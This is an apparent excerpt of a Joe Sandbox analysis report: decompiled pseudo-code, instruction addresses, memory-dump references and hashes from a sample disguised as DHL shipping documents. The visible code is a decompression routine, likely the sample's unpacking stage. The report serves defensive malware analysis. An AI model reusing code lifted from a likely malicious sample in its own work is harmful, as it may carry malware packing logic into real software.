                        													__eflags = __eax;
                        													 *__esi = __ax;
                        												} else {
                        													 *(__ebp - 0x10) = __ecx;
                        													0x800 = 0x800 - __edi;
                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        													__ebx = __ebx + __ebx;
                        													 *__esi = __cx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													continue;
                        												} else {
                        													L53:
                        													goto L46;
                        												}
                        											}
                        											L54:
                        											_t173 = __ebp - 0x34;
                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                        											__eflags =  *_t173;
                        											goto L55;
                        										case 0xf:
                        											L58:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												L161:
                        												 *(__ebp - 0x88) = 0xf;
                        												goto L170;
                        											}
                        											L59:
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t203 = __ebp - 0x70;
                        											 *_t203 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t203;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											L60:
                        											__eflags = __ebx - 0x100;
                        											if(__ebx >= 0x100) {
                        												L55:
                        												__al =  *(__ebp - 0x44);
                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                        												goto L56;
                        											}
                        											L61:
                        											__eax =  *(__ebp - 0x58);
                        											__edx = __ebx + __ebx;
                        											__ecx =  *(__ebp - 0x10);
                        											__esi = __edx + __eax;
                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                        											__ax =  *__esi;
                        											 *(__ebp - 0x54) = __esi;
                        											__edi = __ax & 0x0000ffff;
                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        											__eflags =  *(__ebp - 0xc) - __ecx;
                        											if( *(__ebp - 0xc) >= __ecx) {
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        												__cx = __ax;
                        												_t217 = __edx + 1; // 0x1
                        												__ebx = _t217;
                        												__cx = __ax >> 5;
                        												__eflags = __eax;
                        												 *__esi = __ax;
                        											} else {
                        												 *(__ebp - 0x10) = __ecx;
                        												0x800 = 0x800 - __edi;
                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        												__ebx = __ebx + __ebx;
                        												 *__esi = __cx;
                        											}
                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                        											 *(__ebp - 0x44) = __ebx;
                        											if( *(__ebp - 0x10) >= 0x1000000) {
                        												goto L60;
                        											} else {
                        												L65:
                        												goto L58;
                        											}
                        										case 0x10:
                        											L109:
                        											__eflags =  *(__ebp - 0x6c);
                        											if( *(__ebp - 0x6c) == 0) {
                        												L165:
                        												 *(__ebp - 0x88) = 0x10;
                        												goto L170;
                        											}
                        											L110:
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t365 = __ebp - 0x70;
                        											 *_t365 =  *(__ebp - 0x70) + 1;
                        											__eflags =  *_t365;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											goto L111;
                        										case 0x11:
                        											L69:
                        											__esi =  *(__ebp - 0x58);
                        											 *(__ebp - 0x84) = 0x12;
                        											goto L132;
                        										case 0x12:
                        											L128:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												L131:
                        												__eax =  *(__ebp - 0x58);
                        												 *(__ebp - 0x84) = 0x13;
                        												__esi =  *(__ebp - 0x58) + 2;
                        												L132:
                        												 *(_t644 - 0x54) = _t642;
                        												goto L133;
                        											}
                        											L129:
                        											__eax =  *(__ebp - 0x4c);
                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                        											__ecx =  *(__ebp - 0x58);
                        											__eax =  *(__ebp - 0x4c) << 4;
                        											__eflags = __eax;
                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                        											goto L130;
                        										case 0x13:
                        											L141:
                        											__eflags =  *(__ebp - 0x40);
                        											if( *(__ebp - 0x40) != 0) {
                        												L143:
                        												_t469 = __ebp - 0x58;
                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                        												__eflags =  *_t469;
                        												 *(__ebp - 0x30) = 0x10;
                        												 *(__ebp - 0x40) = 8;
                        												L144:
                        												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                        												L145:
                        												 *(_t644 - 0x50) = 1;
                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                        												goto L149;
                        											}
                        											L142:
                        											__eax =  *(__ebp - 0x4c);
                        											__ecx =  *(__ebp - 0x58);
                        											__eax =  *(__ebp - 0x4c) << 4;
                        											 *(__ebp - 0x30) = 8;
                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                        											L130:
                        											 *(__ebp - 0x58) = __eax;
                        											 *(__ebp - 0x40) = 3;
                        											goto L144;
                        										case 0x14:
                        											L156:
                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                        											__eax =  *(__ebp - 0x80);
                        											while(1) {
                        												L140:
                        												 *(_t644 - 0x88) = _t537;
                        												goto L1;
                        											}
                        										case 0x15:
                        											L91:
                        											__eax = 0;
                        											__eflags =  *(__ebp - 0x38) - 7;
                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        											__al = __al & 0x000000fd;
                        											__eax = (__eflags >= 0) - 1 + 0xb;
                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                        											goto L120;
                        										case 0x16:
                        											goto L0;
                        										case 0x17:
                        											while(1) {
                        												L145:
                        												 *(_t644 - 0x50) = 1;
                        												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                        												goto L149;
                        											}
                        										case 0x18:
                        											goto L146;
                        										case 0x19:
                        											L94:
                        											__eflags = __ebx - 4;
                        											if(__ebx < 4) {
                        												L98:
                        												 *(__ebp - 0x2c) = __ebx;
                        												L119:
                        												_t393 = __ebp - 0x2c;
                        												 *_t393 =  *(__ebp - 0x2c) + 1;
                        												__eflags =  *_t393;
                        												L120:
                        												__eax =  *(__ebp - 0x2c);
                        												__eflags = __eax;
                        												if(__eax == 0) {
                        													L166:
                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                        													goto L170;
                        												}
                        												L121:
                        												__eflags = __eax -  *(__ebp - 0x60);
                        												if(__eax >  *(__ebp - 0x60)) {
                        													goto L171;
                        												}
                        												L122:
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                        												__eax =  *(__ebp - 0x30);
                        												_t400 = __ebp - 0x60;
                        												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                        												__eflags =  *_t400;
                        												goto L123;
                        											}
                        											L95:
                        											__ecx = __ebx;
                        											__eax = __ebx;
                        											__ecx = __ebx >> 1;
                        											__eax = __ebx & 0x00000001;
                        											__ecx = (__ebx >> 1) - 1;
                        											__al = __al | 0x00000002;
                        											__eax = (__ebx & 0x00000001) << __cl;
                        											__eflags = __ebx - 0xe;
                        											 *(__ebp - 0x2c) = __eax;
                        											if(__ebx >= 0xe) {
                        												L97:
                        												__ebx = 0;
                        												 *(__ebp - 0x48) = __ecx;
                        												L102:
                        												__eflags =  *(__ebp - 0x48);
                        												if( *(__ebp - 0x48) <= 0) {
                        													L107:
                        													__eax = __eax + __ebx;
                        													 *(__ebp - 0x40) = 4;
                        													 *(__ebp - 0x2c) = __eax;
                        													__eax =  *(__ebp - 4);
                        													__eax =  *(__ebp - 4) + 0x644;
                        													__eflags = __eax;
                        													L108:
                        													__ebx = 0;
                        													 *(__ebp - 0x58) = __eax;
                        													 *(__ebp - 0x50) = 1;
                        													 *(__ebp - 0x44) = 0;
                        													 *(__ebp - 0x48) = 0;
                        													L112:
                        													__eax =  *(__ebp - 0x40);
                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                        														L118:
                        														_t391 = __ebp - 0x2c;
                        														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                        														__eflags =  *_t391;
                        														goto L119;
                        													}
                        													L113:
                        													__eax =  *(__ebp - 0x50);
                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                        													__eax =  *(__ebp - 0x58);
                        													__esi = __edi + __eax;
                        													 *(__ebp - 0x54) = __esi;
                        													__ax =  *__esi;
                        													__ecx = __ax & 0x0000ffff;
                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                        													__eflags =  *(__ebp - 0xc) - __edx;
                        													if( *(__ebp - 0xc) >= __edx) {
                        														__ecx = 0;
                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                        														__ecx = 1;
                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                        														__ebx = 1;
                        														__ecx =  *(__ebp - 0x48);
                        														__ebx = 1 << __cl;
                        														__ecx = 1 << __cl;
                        														__ebx =  *(__ebp - 0x44);
                        														__ebx =  *(__ebp - 0x44) | __ecx;
                        														__cx = __ax;
                        														__cx = __ax >> 5;
                        														__eax = __eax - __ecx;
                        														__edi = __edi + 1;
                        														__eflags = __edi;
                        														 *(__ebp - 0x44) = __ebx;
                        														 *__esi = __ax;
                        														 *(__ebp - 0x50) = __edi;
                        													} else {
                        														 *(__ebp - 0x10) = __edx;
                        														0x800 = 0x800 - __ecx;
                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                        														 *__esi = __dx;
                        													}
                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                        													if( *(__ebp - 0x10) >= 0x1000000) {
                        														L111:
                        														_t368 = __ebp - 0x48;
                        														 *_t368 =  *(__ebp - 0x48) + 1;
                        														__eflags =  *_t368;
                        														goto L112;
                        													} else {
                        														L117:
                        														goto L109;
                        													}
                        												}
                        												L103:
                        												__ecx =  *(__ebp - 0xc);
                        												__ebx = __ebx + __ebx;
                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        												 *(__ebp - 0x44) = __ebx;
                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                        													__ecx =  *(__ebp - 0x10);
                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                        													__ebx = __ebx | 0x00000001;
                        													__eflags = __ebx;
                        													 *(__ebp - 0x44) = __ebx;
                        												}
                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                        												if( *(__ebp - 0x10) >= 0x1000000) {
                        													L101:
                        													_t338 = __ebp - 0x48;
                        													 *_t338 =  *(__ebp - 0x48) - 1;
                        													__eflags =  *_t338;
                        													goto L102;
                        												} else {
                        													L106:
                        													goto L99;
                        												}
                        											}
                        											L96:
                        											__edx =  *(__ebp - 4);
                        											__eax = __eax - __ebx;
                        											 *(__ebp - 0x40) = __ecx;
                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                        											goto L108;
                        										case 0x1a:
                        											L56:
                        											__eflags =  *(__ebp - 0x64);
                        											if( *(__ebp - 0x64) == 0) {
                        												L162:
                        												 *(__ebp - 0x88) = 0x1a;
                        												goto L170;
                        											}
                        											L57:
                        											__ecx =  *(__ebp - 0x68);
                        											__al =  *(__ebp - 0x5c);
                        											__edx =  *(__ebp - 8);
                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        											 *( *(__ebp - 0x68)) = __al;
                        											__ecx =  *(__ebp - 0x14);
                        											 *(__ecx +  *(__ebp - 8)) = __al;
                        											__eax = __ecx + 1;
                        											__edx = 0;
                        											_t192 = __eax %  *(__ebp - 0x74);
                        											__eax = __eax /  *(__ebp - 0x74);
                        											__edx = _t192;
                        											goto L80;
                        										case 0x1b:
                        											L76:
                        											__eflags =  *(__ebp - 0x64);
                        											if( *(__ebp - 0x64) == 0) {
                        												L163:
                        												 *(__ebp - 0x88) = 0x1b;
                        												goto L170;
                        											}
                        											L77:
                        											__eax =  *(__ebp - 0x14);
                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        											__eflags = __eax -  *(__ebp - 0x74);
                        											if(__eax >=  *(__ebp - 0x74)) {
                        												__eax = __eax +  *(__ebp - 0x74);
                        												__eflags = __eax;
                        											}
                        											__edx =  *(__ebp - 8);
                        											__cl =  *(__eax + __edx);
                        											__eax =  *(__ebp - 0x14);
                        											 *(__ebp - 0x5c) = __cl;
                        											 *(__eax + __edx) = __cl;
                        											__eax = __eax + 1;
                        											__edx = 0;
                        											_t275 = __eax %  *(__ebp - 0x74);
                        											__eax = __eax /  *(__ebp - 0x74);
                        											__edx = _t275;
                        											__eax =  *(__ebp - 0x68);
                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        											_t284 = __ebp - 0x64;
                        											 *_t284 =  *(__ebp - 0x64) - 1;
                        											__eflags =  *_t284;
                        											 *( *(__ebp - 0x68)) = __cl;
                        											L80:
                        											 *(__ebp - 0x14) = __edx;
                        											goto L81;
                        										case 0x1c:
                        											while(1) {
                        												L123:
                        												__eflags =  *(__ebp - 0x64);
                        												if( *(__ebp - 0x64) == 0) {
                        													break;
                        												}
                        												L124:
                        												__eax =  *(__ebp - 0x14);
                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        												__eflags = __eax -  *(__ebp - 0x74);
                        												if(__eax >=  *(__ebp - 0x74)) {
                        													__eax = __eax +  *(__ebp - 0x74);
                        													__eflags = __eax;
                        												}
                        												__edx =  *(__ebp - 8);
                        												__cl =  *(__eax + __edx);
                        												__eax =  *(__ebp - 0x14);
                        												 *(__ebp - 0x5c) = __cl;
                        												 *(__eax + __edx) = __cl;
                        												__eax = __eax + 1;
                        												__edx = 0;
                        												_t414 = __eax %  *(__ebp - 0x74);
                        												__eax = __eax /  *(__ebp - 0x74);
                        												__edx = _t414;
                        												__eax =  *(__ebp - 0x68);
                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                        												__eflags =  *(__ebp - 0x30);
                        												 *( *(__ebp - 0x68)) = __cl;
                        												 *(__ebp - 0x14) = _t414;
                        												if( *(__ebp - 0x30) > 0) {
                        													continue;
                        												} else {
                        													L127:
                        													L81:
                        													 *(__ebp - 0x88) = 2;
                        													goto L1;
                        												}
                        											}
                        											L167:
                        											 *(__ebp - 0x88) = 0x1c;
                        											goto L170;
                        									}
                        								}
                        								L171:
                        								_t539 = _t538 | 0xffffffff;
                        								goto L172;
                        							}
                        						}
                        					}
                        				}
                        			}















                        0x00000000
                        0x00407053
                        0x00407004
                        0x00407004
                        0x00407007
                        0x0040700a
                        0x00407014
                        0x00000000
                        0x00000000
                        0x00407068
                        0x00407068
                        0x0040706c
                        0x0040708f
                        0x00407092
                        0x00407095
                        0x0040709f
                        0x0040706e
                        0x0040706e
                        0x00407071
                        0x00407074
                        0x00407077
                        0x00407084
                        0x00407087
                        0x00407087
                        0x00000000
                        0x00000000
                        0x004070ab
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x0040711c
                        0x0040711c
                        0x00407120
                        0x00407127
                        0x00407127
                        0x0040712a
                        0x0040712d
                        0x00407137
                        0x00000000
                        0x00407137
                        0x00407122
                        0x00407122
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x0040715d
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00406df8
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x00407569
                        0x00000000
                        0x00407569
                        0x00406e02
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00406e1d
                        0x00406e1d
                        0x00406e20
                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x00000000
                        0x00000000
                        0x00407395
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x0040739b
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x0040749d
                        0x00407458
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00407447
                        0x00407447
                        0x00000000
                        0x0040744d
                        0x00000000
                        0x0040717d
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x0040749d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004071c2
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725b
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004074c7
                        0x00407490

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                        • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                        • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                        • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E00407395() {
                        				void _t533;
                        				signed int _t534;
                        				signed int _t535;
                        				signed int* _t605;
                        				void* _t612;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					if( *(_t612 - 0x40) != 0) {
                        						 *(_t612 - 0x84) = 0x13;
                        						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                        						goto L132;
                        					} else {
                        						__eax =  *(__ebp - 0x4c);
                        						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
